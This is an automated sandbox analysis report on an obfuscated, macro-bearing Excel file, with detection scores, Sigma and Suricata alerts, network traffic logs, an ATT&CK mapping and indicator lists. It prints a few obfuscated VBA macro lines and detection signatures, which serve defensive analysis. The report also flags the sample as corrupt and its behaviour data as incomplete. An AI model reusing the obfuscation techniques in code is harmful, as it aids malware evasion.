Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
.xls

Overview

General Information

Sample name:.xls
Analysis ID:1634932
MD5:c0cff8451fb639d2fd1946df7969395e
SHA1:634d52e10e168a61c8201130f44925cc497c1251
SHA256:fd669c40ad347a178ceead1f771af78fed66c4313013641d32ca28981acb97d5
Tags:xlsuser-zhuzhu0009
Infos:
Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains embedded VBA macros
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 8120 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 8568 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8120, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49734, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8120, Protocol: tcp, SourceIp: 13.107.246.60, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-11T07:12:46.182510+010020283713Unknown Traffic192.168.2.44973413.107.246.60443TCP
2025-03-11T07:12:49.028320+010020283713Unknown Traffic192.168.2.44973513.107.246.60443TCP
2025-03-11T07:12:50.784291+010020283713Unknown Traffic192.168.2.44973613.107.246.60443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: .xlsVirustotal: Detection: 24%Perma Link
Source: .xlsReversingLabs: Detection: 15%
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 13.107.246.60:443
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 13.107.246.60:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49736 version: TLS 1.2

System Summary

barindex
Source: .xlsOLE, VBA macro line: Open Environ(O000O110001OOOO11()) & O111OO111OO101101() For Output As fileNumber
Source: .xlsOLE, VBA macro line: Application.Quit
Source: .xlsOLE, VBA macro line: O11111O1O1110OO1O = Environ(O1O1OO101O11O010O())
Source: .xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal56.expl.evad.winXLS@3/1@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{6E5C2C0C-90D2-4C3E-B6C5-1C9082E603DF} - OProcSessId.datJump to behavior
Source: .xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: .xlsVirustotal: Detection: 24%
Source: .xlsReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: .xlsStatic file information: File size 3369984 > 1048576

Data Obfuscation

barindex
Source: .xlsStream path '_VBA_PROJECT_CUR/VBA/Sheet1' : High number of string operations
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 855Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information21
Scripting
Valid Accounts3
Exploitation for Client Execution
21
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
.xls24%VirustotalBrowse
.xls16%ReversingLabsDocument.Trojan.Chartres
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s-0005.dual-s-msedge.net
52.123.128.14
truefalse
    high
    s-part-0032.t-0009.t-msedge.net
    13.107.246.60
    truefalse
      high
      otelrules.svc.static.microsoft
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
          high
          https://otelrules.svc.static.microsoft/rules/rule120600v5s19.xmlfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            13.107.246.60
            s-part-0032.t-0009.t-msedge.netUnited States
            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1634932
            Start date and time:2025-03-11 07:10:29 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 26s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:20
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:.xls
            Detection:MAL
            Classification:mal56.expl.evad.winXLS@3/1@1/1
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            • Corrupt sample or wrongly selected analyzer.
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 23.60.203.209, 52.109.32.97, 52.109.76.243, 104.208.16.91, 40.126.32.140, 52.123.128.14, 4.245.163.56
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, onedscolprdcus17.centralus.cloudapp.azure.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ukw-azsc-config.officeapps.live.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, config.officeapps.live.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            02:12:38API Interceptor872x Sleep call for process: splwow64.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
            • www.mimecast.com/Customers/Support/Contact-support/
            http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
            • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            s-part-0032.t-0009.t-msedge.netf468369488.exeGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            FK0OQMzPxN.exeGet hashmaliciousDBatLoader, PureLog StealerBrowse
            • 13.107.246.60
            840.xlsGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            Order_Mar25.xlsGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            840.xlsGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            https://simplified.com/designs/7d05440c-37c6-4466-b5ff-6e61f39c0350/share?utm_content=7d05440c-37c6-4466-b5ff-6e61f39c0350&utm_campaign=share&utm_medium=link&utm_source=projectlinksGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            s-0005.dual-s-msedge.netf468369488.exeGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            1741618096-102373-7694-5517-2.emlGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
            • 52.123.129.14
            FW Sensitive - ADMINISTRATIVE LICENSE REVOCATION (ALR) HEARING REQUEST.msgGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Order_Mar25.xlsGet hashmaliciousUnknownBrowse
            • 52.123.129.14
            COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
            • 52.123.129.14
            FW Sensitive - ADMINISTRATIVE LICENSE REVOCATION (ALR) HEARING REQUEST.msgGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
            • 52.123.129.14
            Order_Mar25.xlsGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            840.xlsGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            MICROSOFT-CORP-MSN-AS-BLOCKUScbr.ppc.elfGet hashmaliciousMiraiBrowse
            • 20.165.7.72
            cbr.arm7.elfGet hashmaliciousMiraiBrowse
            • 20.77.131.126
            cbr.x86.elfGet hashmaliciousMiraiBrowse
            • 104.42.23.140
            4lHZn6Ri2B.exeGet hashmaliciousFormBookBrowse
            • 204.79.197.203
            5Jo27lN4ib.exeGet hashmaliciousFormBookBrowse
            • 20.2.217.253
            f468369488.exeGet hashmaliciousUnknownBrowse
            • 40.126.35.144
            0xHPSESJcg.exeGet hashmaliciousFormBookBrowse
            • 204.79.197.203
            EEcYuuRdFy.exeGet hashmaliciousFormBookBrowse
            • 204.79.197.203
            3P5I851G78.exeGet hashmaliciousFormBookBrowse
            • 204.79.197.203
            IkFozP4Gsw.exeGet hashmaliciousFormBookBrowse
            • 204.79.197.203
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            a0e9f5d64349fb13191bc781f81f42e1https://ai.omeclk.com/portal/wts/ug%5Ecmsb8As6bbOewDczQAzqeq-sjswaGet hashmaliciousCAPTCHA Scam ClickFixBrowse
            • 13.107.246.60
            9Fat24-jfN6-5Skq7-T70.msiGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            Loader.exeGet hashmaliciousLummaC StealerBrowse
            • 13.107.246.60
            Nexora.exeGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            Malware.zipGet hashmaliciousLummaC StealerBrowse
            • 13.107.246.60
            Launcher.exeGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            CryptocommSetup.msiGet hashmaliciousBumbleBeeBrowse
            • 13.107.246.60
            COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            Order_Mar25.xlsGet hashmaliciousUnknownBrowse
            • 13.107.246.60
            file.exeGet hashmaliciousLummaC StealerBrowse
            • 13.107.246.60
            No context
            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):118
            Entropy (8bit):3.5700810731231707
            Encrypted:false
            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
            MD5:573220372DA4ED487441611079B623CD
            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
            Malicious:false
            Reputation:high, very likely benign file
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 932, Author: openpyxl, Last Saved By: admin, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Mar 6 03:21:37 2025, Last Saved Time/Date: Thu Mar 6 04:15:54 2025, Security: 0
            Entropy (8bit):6.11129490990527
            TrID:
            • Microsoft Excel sheet (30009/1) 47.99%
            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
            File name:.xls
            File size:3'369'984 bytes
            MD5:c0cff8451fb639d2fd1946df7969395e
            SHA1:634d52e10e168a61c8201130f44925cc497c1251
            SHA256:fd669c40ad347a178ceead1f771af78fed66c4313013641d32ca28981acb97d5
            SHA512:53a9ceef961059cf33976c9915fa050f9f5d6b14fe77d28279b8d9594f3c168fae92d49193c7d0838e39f8c0ceff9f6685c654649588c2bd66f9e587d2bd24b1
            SSDEEP:49152:Ukc6HMAR8lxBiIZI6YKjqrb3QOtlmPb4XuqFMX+w7:
            TLSH:83F523207E829E3BC91C573C219FDF0A06615E808D46E5D733AC7B6F3A7BBA0524652D
            File Content Preview:........................>...................4..............."...................v...w...x...y...z...{...|...}...~.......................7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...1...2...3...4...5...6...7...8...9...:..
